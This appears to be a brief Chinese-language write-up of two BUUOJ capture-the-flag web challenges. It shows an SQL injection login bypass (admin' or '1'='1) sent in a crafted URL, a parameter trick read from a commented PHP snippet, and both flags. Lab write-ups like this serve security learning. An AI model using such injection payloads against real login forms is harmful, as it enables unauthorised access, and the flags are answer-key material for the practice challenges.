BUUOJ-WEB
阿新 • • 發佈:2020-09-14
WEB-[極客大挑戰 2019]EasySQL1
1.開啟後先用amdin/admin嘗試,返回錯誤的使用者名稱密碼
2.之後admin後加'刺探一波,返回:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''admin''' at line 1
之後再嘗試一波萬能密碼:admin' or '1'='1還是返回錯誤的使用者名稱密碼
3.沒出結果,但是這裡肯定是用注入的,接著使用,第二種,不去判斷密碼的正確性。
4.還有一種辦法,直接再密碼處用一次萬能密碼http://fef71e4d-9851-46e9-a55a-5a827df467fe.node3.buuoj.cn/check.php?username=admin&password=admin%27%20or%20%271%27=%271
flag
flag{aad4bda2-1d72-47d0-b133-1d025e80b4aa}
WEB-[極客大挑戰 2019]Havefun1
1.拿到題後F12得到:
<!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}
-->
接著構造引數?cat=dog得到flag
flag
flag{09c2aece-9347-48d0-8eb6-768b15724864}